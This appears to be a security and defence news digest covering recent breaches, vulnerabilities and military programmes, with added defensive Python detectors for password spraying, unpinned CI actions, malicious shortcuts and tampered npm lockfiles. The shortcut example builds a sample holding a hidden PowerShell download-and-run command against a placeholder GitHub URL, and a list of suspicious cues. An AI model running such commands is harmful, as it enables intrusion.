🔍 TrueConf Zero-Day Hits Southeast Asia
A zero-day vulnerability in TrueConf, tracked as CVE-2026-3502 with a CVSS score of 7.8, has been exploited in targeted attacks against government entities across Southeast Asia. The campaign has been designated Operation TrueChaos by researchers tracking the activity.
The exploitation of video conferencing infrastructure against government targets follows a documented pattern of threat actors prioritizing communication platforms as initial access vectors. A CVSS base score of 7.8 sits in the High band, and the score alone does not fix the attack vector; in CVSS v3.1, though, 7.8 is the characteristic score of a local-vector, low-complexity flaw with full confidentiality, integrity and availability impact that needs either low privileges or a user action, such as opening a crafted file or link in the client. It is not the network-reachable, pre-authentication profile that pushes a score above 9, so the likely chain pairs the bug with a lured user or an existing low-privileged foothold, and TrueConf clients belong in patch scope alongside servers until the vendor advisory narrows it.
🛰️ Open sources - closed narratives
@sitreports
🔍 Claude Code Source Exposes Data Collection
A source code leak of Anthropic's Claude Code tool has revealed the scope of system and user data the application collects during operation, according to The Register's analysis. The exposed code details telemetry collection covering local system environment, file paths, and session activity transmitted to Anthropic's infrastructure.
The disclosure fits a pattern of AI developer tooling collecting substantially broader telemetry than its user-facing documentation describes. CLI coding assistants run as the invoking user, with that user's filesystem and shell access, so their collection surface is not just the conversation log: working-directory paths, details of the local environment and per-session activity are all visible to the tool and, per the exposed code, are sent upstream. The practical check is to read what the tool's telemetry and opt-out settings actually cover before pointing it at repositories with sensitive paths or credentials on disk.
🔍 Iran Sprays M365, Targets Missile Strike Cities
Iranian threat actors have conducted password-spraying campaigns against Microsoft 365 accounts, with researchers identifying a pattern in the target selection: affected accounts correlate geographically with cities previously hit by Iranian missile strikes.
The overlap between kinetic strike locations and credential-access targets indicates a coordinated intelligence-collection effort running parallel to, or following, physical strike operations. Password spraying against M365, a few guesses per account across many accounts so that no single account trips a lockout threshold, is cheap and leaves a faint per-account signal; it shows up mainly in aggregate, as one source address touching many accounts inside a short window. A successful guess yields a valid credential rather than an exploit, which is what makes the method suited to sustained access rather than one-time exploitation.
The pattern fits established doctrine of pairing kinetic operations with follow-on signals collection against surviving infrastructure and personnel in the same geographic zones.
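The aggregate signal described above is the thing to hunt for. The following is an added example, not code from the reporting or from any vendor: a detector that walks sign-in records shaped like a Microsoft Entra ID sign-in log export, groups rejected password attempts by source address, and flags an address that touches many distinct accounts inside a window while never exceeding a small per-account count, then lists any later success from that same address as the first account to pull. The log, the addresses, the account names and the city labels are constructed for the example; the result codes 50126 (invalid username or password) and 50053 (account locked) are real Entra codes.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Entra ID sign-in result codes meaning a password was tried and rejected:
# 50126 = invalid username or password, 50053 = account locked. 0 = success.
GUESS_REJECTED = {50126, 50053}
SUCCESS = 0
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _ts(minutes: int) -> str:
    base = datetime(2026, 4, 1, 2, 0, tzinfo=timezone.utc)
    return (base + timedelta(minutes=minutes)).strftime(TIME_FMT)


def build_sample_log() -> str:
    """Constructed sample in the shape of a sign-in log export, not a real capture: twelve
    accounts in (hypothetical) strike-affected cities each get one rejected guess from
    203.0.113.7 three minutes apart, one of them later succeeds from the same address,
    and an unrelated user mistypes a password twice from an office address."""
    cities = ["Haifa", "Manama", "Abu Dhabi", "Tel Aviv", "Dubai", "Beersheba"] * 2
    rows = [{"createdDateTime": _ts(3 * i), "userPrincipalName": f"user{i:02d}@example.org",
             "ipAddress": "203.0.113.7", "errorCode": 50126, "city": city}
            for i, city in enumerate(cities)]
    rows.append({"createdDateTime": _ts(40), "userPrincipalName": "user07@example.org",
                 "ipAddress": "203.0.113.7", "errorCode": SUCCESS, "city": "Tel Aviv"})
    rows += [{"createdDateTime": _ts(m), "userPrincipalName": "alice@example.org",
              "ipAddress": "198.51.100.20", "errorCode": 50126, "city": "Haifa"} for m in (5, 6)]
    return "\n".join(json.dumps(r) for r in rows)


def _t(event: dict) -> datetime:
    return datetime.strptime(event["createdDateTime"], TIME_FMT).replace(tzinfo=timezone.utc)


def detect_password_spray(log_text: str, window=timedelta(hours=1),
                          min_accounts=10, max_per_account=3) -> list:
    """Flag source addresses whose rejected guesses inside `window` touch at least
    `min_accounts` distinct accounts without exceeding `max_per_account` guesses on any
    one of them: the low-and-slow shape that stays under per-account lockout."""
    events = sorted((json.loads(l) for l in log_text.splitlines() if l.strip()), key=_t)
    failures = defaultdict(list)
    for ev in events:
        if ev["errorCode"] in GUESS_REJECTED:
            failures[ev["ipAddress"]].append(ev)
    alerts = []
    for ip, evs in failures.items():
        best, start = None, 0
        for end in range(len(evs)):                      # sliding window over this IP's failures
            while _t(evs[end]) - _t(evs[start]) > window:
                start += 1
            per_account = Counter(ev["userPrincipalName"] for ev in evs[start:end + 1])
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                if best is None or len(per_account) > best[0]:
                    best = (len(per_account), start, end)
        if best is None:
            continue
        n, s, e_end = best
        window_events = evs[s:e_end + 1]
        # A success from the same address once the spray is under way is the account to pull first.
        hits = sorted({ev["userPrincipalName"] for ev in events
                       if ev["ipAddress"] == ip and ev["errorCode"] == SUCCESS
                       and _t(ev) >= _t(window_events[0])})
        alerts.append({"ip": ip, "accounts": n,
                       "cities": sorted({ev["city"] for ev in window_events}),
                       "likely_compromised": hits})
    return alerts


if __name__ == "__main__":
    print(json.dumps(detect_password_spray(build_sample_log()), indent=2))
```

The thresholds are the knobs a real deployment tunes: `max_per_account` should sit below the tenant's smart-lockout threshold, because an attacker who knows that threshold stays just under it, and `window` should be long enough to catch sprays that pace one guess per account per hour. The user who mistypes twice from 198.51.100.20 never trips the detector because the distinct-account count stays at one.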
💻 Cisco Source Code Stolen via Trivy
A threat actor used credentials obtained through the Trivy supply chain compromise to access Cisco's internal development environment, exfiltrating source code belonging to Cisco and an undisclosed number of its customers.
The incident illustrates how supply chain breaches function as credential harvesting operations with delayed downstream impact. A single compromise in a shared developer toolchain — in this case Trivy, a widely used vulnerability scanner — yields access to multiple organizations through legitimate-appearing authentication.
For Cisco customers whose proprietary code was stored in the affected environment, the exposure extends beyond the vendor relationship: stolen source can be mined for exploitable flaws and for any credentials or signing material checked in alongside it, and the attacker gets to look before the code owner does. Rotating every secret that ever lived in that tree is the first response, independent of how sensitive the code itself was.
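The page does not say how the Trivy compromise reached Cisco's environment. The common way a compromised scanner harvests credentials is through its CI integration, where a mutable tag such as `@master` or `@v0` can be repointed at malicious code that then reads the secrets handed to the job. The following is an added example, not Cisco's or Trivy's code: a checker that scans a GitHub Actions workflow for third-party actions referenced by anything other than a full commit SHA and, when it finds any, lists every secret the workflow references, which is the rotation list if one of those actions turns out to have been compromised. The workflow text is constructed; `actions/checkout` and `aquasecurity/trivy-action` are real action names used only as illustration, and the 40-character pins in the hardened variant are placeholders, not those projects' real commits.

```python
import re

# A ref is immutable only when it is a full 40-hex commit SHA; tags and branches can be moved.
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w./-]+)@([^\s#]+)")
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")


def audit_workflow(text: str) -> dict:
    """Report third-party actions referenced by a mutable ref and, if any exist, every secret
    the workflow references. A malicious step on a runner can reach the secrets handed to any
    step of the same job (the runner worker holds them in memory), so the conservative
    rotation scope after an action compromise is the whole workflow."""
    unpinned, pinned = [], []
    for line in text.splitlines():
        m = USES_RE.match(line)
        if m:
            action, ref = m.groups()
            (pinned if SHA_RE.match(ref) else unpinned).append((action, ref))
    secrets = sorted(set(SECRET_RE.findall(text)))
    return {"unpinned": unpinned, "pinned": pinned,
            "rotate_if_compromised": secrets if unpinned else []}


# Constructed workflow in the weak form: both actions follow a tag or branch that the
# upstream maintainer (or whoever holds their credentials) can move at any time.
WEAK_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Scan filesystem
        uses: aquasecurity/trivy-action@master
        with:
          scan-type: fs
      - name: Publish
        run: ./publish.sh
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
"""

# Same workflow with every action pinned to a commit SHA, e.g.
#   uses: aquasecurity/trivy-action@<40-hex-sha>  # v0.x
# The SHAs below are placeholders, not the projects' real commits; look the current ones up.
PINNED_WORKFLOW = WEAK_WORKFLOW.replace(
    "actions/checkout@v4", "actions/checkout@" + "1" * 40).replace(
    "aquasecurity/trivy-action@master", "aquasecurity/trivy-action@" + "2" * 40)


if __name__ == "__main__":
    for name, wf in (("weak", WEAK_WORKFLOW), ("pinned", PINNED_WORKFLOW)):
        print(name, audit_workflow(wf))
```

Pinning by SHA does not make an upstream project trustworthy; it makes a silent swap impossible, so that an update to the pin is a reviewable change rather than something that happens to every consumer at once. Pair it with a dependency-update bot so the pins do not rot, and run the publish step in a separate job from third-party scanners so the tokens it needs are never in the same runner's memory.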
🔍 Pentagon Advances Drone Swarm Program
The U.S. Department of Defense is preparing a drone swarm testing initiative designated Swarm Forge, classified as one of several pace-setting projects directed by Defense Secretary Pete Hegseth in a departmental memo on AI integration.
The initiative fits a broader DoD pattern of accelerating autonomous systems development under direct secretarial mandate, placing swarm coordination alongside other AI-priority programs at the institutional level. Designating such projects as pace-setters signals resource prioritization and reduced bureaucratic friction in acquisition and testing cycles.
🔍 Pentagon Deploys Bunkers, Tech for Iran
As of March 31, U.S. Central Command has recorded at least 348 U.S. military personnel wounded in the ongoing Iran war. The casualty figures accompany Pentagon moves to expand hardened shelter capacity and additional force protection technologies under Operation Epic Fury.
The push toward increased bunker infrastructure signals a sustained threat environment requiring passive defense solutions alongside active measures. Prioritizing physical hardening reflects an operational assessment that personnel exposure to indirect fire or aerial attack remains a persistent variable in the theater.
🔍 TSMC Japan 3nm Production 2028
TSMC's second factory in Japan is scheduled to begin equipment installation and mass production of 3-nanometre wafers in 2028, according to a Taiwanese government filing. The facility marks TSMC's continued geographic expansion of advanced-node manufacturing beyond Taiwan.
The 3nm node is currently among the most capable process technologies in volume production. Establishing this capacity in Japan shifts a portion of leading-edge semiconductor output into a second jurisdiction, reducing single-point geographic concentration in TSMC's production network.
☁️ Iran Strike Hits AWS Bahrain
An Iranian strike damaged Amazon's cloud computing infrastructure in Bahrain, according to a Reuters report citing the Financial Times.
The incident marks a direct physical impact on commercial cloud infrastructure from state military action. AWS's Bahrain region (me-south-1) serves as a primary node for Gulf-area enterprise and government workloads, making its degradation operationally significant beyond Amazon's commercial exposure; any workload there with no replica or failover path in a second region shares the region's fate.
The targeting — whether deliberate or incidental — establishes a data point on the physical vulnerability of hyperscaler infrastructure to conventional strike activity in contested regions.
🤖 Army Tests AI Strike Drone
The 101st Airborne Division integrated Northrop Grumman's Lumberjack one-way attack drone into a recent training exercise, pairing the system with the Army's Maven Smart System for AI-enabled targeting trials.
The Lumberjack is a loitering munition designed for single-use strike missions. Its integration with Maven — the Army's primary AI targeting platform — indicates a structural push toward machine-assisted engagement decisions at the division level, embedding autonomous strike capacity into conventional airborne formations.
🔍 Handala Claims Israeli Defense Contractor Breach
Iranian hacker group Handala claims to have breached PSK Wind Technologies, a contractor responsible for designing and operating Israeli military command centers and air defense communication systems. The reported breach has not been independently confirmed.
The targeting of a third-party vendor embedded in the IDF supply chain follows an established pattern of perimeter bypass through contractor access. Direct military networks carry hardened defenses; vendors integrated into those networks frequently do not. Handala has previously used this method to reach assets that would otherwise require penetrating military-grade infrastructure.
🔍 UAE Iran Strike Narratives Diverge
A Bellingcat open-source review finds that UAE official statements on Iranian drone and missile strikes do not consistently match physical evidence and imagery available through open-source channels. Discrepancies center on strike outcomes — whether intercepted or successful — and the extent of documented damage.
The pattern fits an established information management model in which regional governments control damage acknowledgment to limit political exposure and maintain deterrence posture. Selective disclosure of intercept claims, without corroborating debris or impact data, functions as a structural feature of official battlefield communication rather than an exception.
📡 Navy Seeks RF Emulation for Drones
The U.S. Navy is pursuing technology capable of producing and managing realistic radio frequency signals on unmanned platforms, with application directed at Pacific Fleet operations. The program targets signal emulation on maritime drones to generate training environments that reflect operational electromagnetic conditions.
The requirement reflects a structural shift in how naval forces approach RF signal training — moving emulation capability onto unmanned systems rather than relying on dedicated shore or vessel-based range infrastructure. This reduces dependency on fixed facilities and embeds signal management directly into deployable drone platforms.
🔍 EU Commission Breach Hits 30 Entities
CERT-EU has attributed a cloud breach of the European Commission to the TeamPCP threat group. The intrusion exposed data belonging to at least 29 additional EU entities beyond the Commission itself.
The incident follows a pattern of adversaries targeting shared cloud infrastructure to achieve lateral data exposure across multiple institutional victims from a single point of compromise. Attribution to a named threat group indicates CERT-EU has sufficient technical indicators to move beyond preliminary assessment.
🔍 Drift Loses $285M, DPRK Linked
On April 1, 2026, decentralized finance platform Drift lost $285 million after attackers used a nonce-based social engineering attack to achieve administrative takeover of the protocol. The vector exploited nonce manipulation to authenticate fraudulent transactions, bypassing standard authorization controls.
The operation fits an established pattern attributed to DPRK-linked threat actors targeting cryptocurrency infrastructure. North Korean units have systematically combined technical exploit development with human-layer manipulation to extract funds from DeFi protocols, with proceeds assessed as financing state programs.
🔍 GitHub Used As North Korea C2
A phishing campaign linked to North Korean operators is targeting South Korean organizations using GitHub as a C2 infrastructure channel. Initial access is delivered via LNK files, Windows shortcut attachments whose embedded target path and command-line arguments run when the recipient opens what looks like a document.
Routing command-and-control traffic through GitHub allows operators to blend malicious communications with legitimate platform activity, complicating network-level detection. The technique reduces the operational signature of the campaign by avoiding dedicated attacker-controlled domains.
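Because the lure is a shortcut rather than an executable, the detection question is what the shortcut actually launches. The following is an added example, not code from the reporting: a parser for the fixed header and StringData section of a Windows Shell Link file per the MS-SHLLINK layout, which pulls out the relative target path and the command-line arguments, plus a cue list that flags script hosts and download-and-run idioms. The sample .lnk is built in the block and is constructed, the raw GitHub URL inside it is a placeholder and not an indicator from the campaign, and the cue list is this example's heuristic rather than anything published about the activity.

```python
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK layout.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (name, relative path, working dir, arguments, icon)."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # LinkTargetIDList: u16 size, then that many bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo: u32 total size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, key in STRING_FIELDS:              # StringData: u16 char count, chars, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


# Cues worth a second look in a shortcut that arrived by e-mail: script hosts, hidden-window
# and encoded-command switches, download-and-run idioms, remote content. Heuristic only.
SUSPICIOUS_CUES = ("powershell", "mshta", "rundll32", "cmd /c", "cmd.exe",
                   "-enc", "-w hidden", "iex", "iwr", "downloadstring", "http")


def suspicious_cues(fields: dict) -> list:
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    return [cue for cue in SUSPICIOUS_CUES if cue in text]


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal .lnk for testing (constructed sample, not a file from the campaign)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, timestamps, size, icon, hotkey, reserved

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample: a shortcut posing as a document that launches PowerShell and pulls a
# second stage from a raw GitHub URL. The repository path is a placeholder, not a real indicator.
SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-nop -w hidden -c "iwr https://raw.githubusercontent.com/placeholder/repo/main/stage.txt | iex"',
)
BENIGN_LNK = build_lnk(r"..\Documents\Q1 report.docx", "")


if __name__ == "__main__":
    for blob in (SAMPLE_LNK, BENIGN_LNK):
        fields = parse_lnk_strings(blob)
        print(fields.get("relative_path"), "|", fields.get("arguments"), "->", suspicious_cues(fields))
```

Real shortcuts usually also carry a LinkTargetIDList and a LinkInfo block; the parser skips over both using their own length fields rather than assuming they are absent, and only the StringData order fixed by the specification is relied on. A mail gateway rule that blocks `.lnk` attachments outright is the cheaper control; the parser is for triage of what got through and for hunting across mail stores.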
🔍 CERT-UA Identity Spoofed, RAT Deployed
Between March 26 and 27, 2025, the Computer Emergency Response Team of Ukraine disrupted a campaign in which threat actors impersonated CERT-UA itself to deliver a Go-based remote access trojan to targets in Ukraine.
Spoofing a national cybersecurity authority to distribute malware inverts the trust model those institutions depend on for incident response coordination. Targets conditioned to act on CERT-UA communications become the attack surface.
📡 Kremlin Pushes State Messenger Adoption
The Kremlin is actively promoting MAX, a state-backed messaging application, as a preferred communications platform for Russian users. According to Reuters reporting, a segment of the population is declining to install the service.
State-promoted messaging infrastructure follows an established pattern in centralized communications strategy: routing civilian traffic through domestically controlled platforms enables metadata retention and content access under national law. Resistance from users indicates the substitution effort has not achieved passive adoption — a marker of incomplete normalization.
🔍 Fortinet Patches FortiClient EMS Flaw
Fortinet has released a patch for CVE-2026-35616, a privilege escalation vulnerability scoring 9.1 on the CVSS scale, affecting FortiClient EMS versions 7.4.5 through 7.4.6. Active exploitation has been recorded since March 31, 2026.
A 9.1 base score is in the Critical band; the standard CVSS v3.1 vectors that produce 9.1 are all network-reachable with no privileges or user interaction required and two of the three impact metrics rated High, so treat this as remotely exploitable without credentials unless the vendor advisory states otherwise. FortiClient EMS is the server that manages and pushes policy to FortiClient endpoints across an enterprise, which makes privilege escalation on it a lateral-movement multiplier rather than a single-host problem; installs on 7.4.5 and 7.4.6 should be upgraded and reviewed for signs of compromise back to March 31, 2026, the start of recorded exploitation.
🔍 Axios npm Compromised via Social Engineering
A maintainer of the Axios HTTP client library — one of the most widely used npm packages — was targeted through a social engineering operation attributed to North Korean threat actors. The attack used a fabricated Microsoft Teams error fix as a pretext to gain access to the maintainer's account, as detailed in a post-mortem published by the Axios team.
The method follows an established pattern in DPRK-linked intrusion sets: targeting individual developers with elevated repository access rather than attacking package infrastructure directly. A maintainer account can publish new versions of the package to the registry, and because most dependents declare a semver range rather than an exact version, a malicious release propagates to every project that installs or updates within that range until it is pulled. The practitioner's check after an incident like this is which version the lockfile actually resolved and whether it came from the expected registry with an intact integrity hash, not merely whether the package name appears in the dependency tree.
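That check can be automated against `package-lock.json`. The following is an added example, not the Axios team's post-mortem tooling or npm's own code: it walks the `packages` map of a lockfileVersion 2/3 lockfile and reports versions on a block list, packages resolved from outside the trusted registry, packages with no integrity hash, and, when the cached tarball bytes are supplied, entries whose Subresource Integrity hash no longer matches what is on disk. The lockfile and tarball bytes are constructed; the axios version number is a real release used only as a dependency name, nothing here says it was tampered with, and the block-list entry, `internal-helper` and `legacy-util` are hypothetical.

```python
import base64
import hashlib
from urllib.parse import urlparse

TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def sri(data: bytes, algo: str = "sha512") -> str:
    """Subresource Integrity string in the form npm writes into package-lock.json."""
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, data).digest()).decode()


def verify_integrity(integrity: str, tarball: bytes) -> bool:
    """True when the lockfile's integrity hash matches the tarball bytes actually installed."""
    algo, _, digest_b64 = integrity.partition("-")
    if algo not in ("sha512", "sha256", "sha1"):
        return False
    return base64.b64decode(digest_b64) == hashlib.new(algo, tarball).digest()


def audit_lockfile(lock: dict, blocked: set, tarballs: dict = None) -> list:
    """Report (name, version, reason) for every suspicious entry in the lockfile."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:                                    # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]      # handles nested and @scoped paths
        version = meta.get("version")
        resolved = meta.get("resolved", "")
        host = urlparse(resolved).hostname
        if (name, version) in blocked:
            findings.append((name, version, "blocked version"))
        if resolved and host not in TRUSTED_REGISTRY_HOSTS:
            findings.append((name, version, f"resolved from untrusted host {host}"))
        if not meta.get("integrity"):
            findings.append((name, version, "no integrity hash"))
        elif tarballs and name in tarballs and not verify_integrity(meta["integrity"], tarballs[name]):
            findings.append((name, version, "integrity mismatch"))
    return findings


# Constructed lockfile and tarball bytes for the example.
AXIOS_TARBALL = b"stand-in bytes for axios-1.7.9.tgz"
SAMPLE_LOCK = {
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app", "dependencies": {"axios": "^1.7.0"}},
        "node_modules/axios": {
            "version": "1.7.9",
            "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz",
            "integrity": sri(AXIOS_TARBALL)},
        "node_modules/internal-helper": {               # hypothetical: pulled from a git host
            "version": "1.0.0",
            "resolved": "https://codeload.github.com/placeholder/internal-helper/tar.gz/abc123",
            "integrity": sri(b"stand-in bytes")},
        "node_modules/legacy-util": {                   # hypothetical: lock entry without a hash
            "version": "0.3.2",
            "resolved": "https://registry.npmjs.org/legacy-util/-/legacy-util-0.3.2.tgz"},
        "node_modules/example-lib": {                   # hypothetical: version on the block list
            "version": "3.4.0",
            "resolved": "https://registry.npmjs.org/example-lib/-/example-lib-3.4.0.tgz",
            "integrity": sri(b"more stand-in bytes")},
    },
}
# Hypothetical block list: (name, version) pairs published during a maintainer-compromise window.
BLOCKED = {("example-lib", "3.4.0")}


if __name__ == "__main__":
    for finding in audit_lockfile(SAMPLE_LOCK, BLOCKED, {"axios": AXIOS_TARBALL}):
        print(*finding)
```

`npm ci` already refuses a tarball whose hash differs from the lockfile, but only for entries that have an `integrity` field and only at install time; the audit above catches the entries that would never be checked and lets you re-verify a tree that was installed before the incident. Setting `ignore-scripts=true` in `.npmrc` removes the install-time code execution a malicious release relies on, at the cost of running needed build scripts explicitly.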
🔍 150 Aircraft Deployed Over Iran
The U.S. military deployed over 150 aircraft to recover a downed aviator in Iran, according to Gen. Dan Caine. The recovery operation included tactical drones, strike aircraft, and additional assets providing overhead protection for search-and-rescue personnel on the ground.
The scale of the deployment reflects standard force-protection doctrine applied to personnel recovery in denied or contested territory — layered air cover to suppress interdiction of ground teams. Committing that volume of assets indicates the operation was conducted under conditions of active or anticipated threat, not permissive airspace.
✈️ Air Force Requests $1B CCA Drones
The U.S. Air Force has submitted a request for nearly $1 billion in fiscal year 2027 to begin CCA procurement, marking the transition of the Collaborative Combat Aircraft program from development into initial acquisition.
The CCA program is designed to field autonomous drone wingmen capable of operating alongside crewed fighter aircraft. A dedicated FY2027 budget line indicates the Air Force is moving toward operational inventory rather than continued prototype evaluation.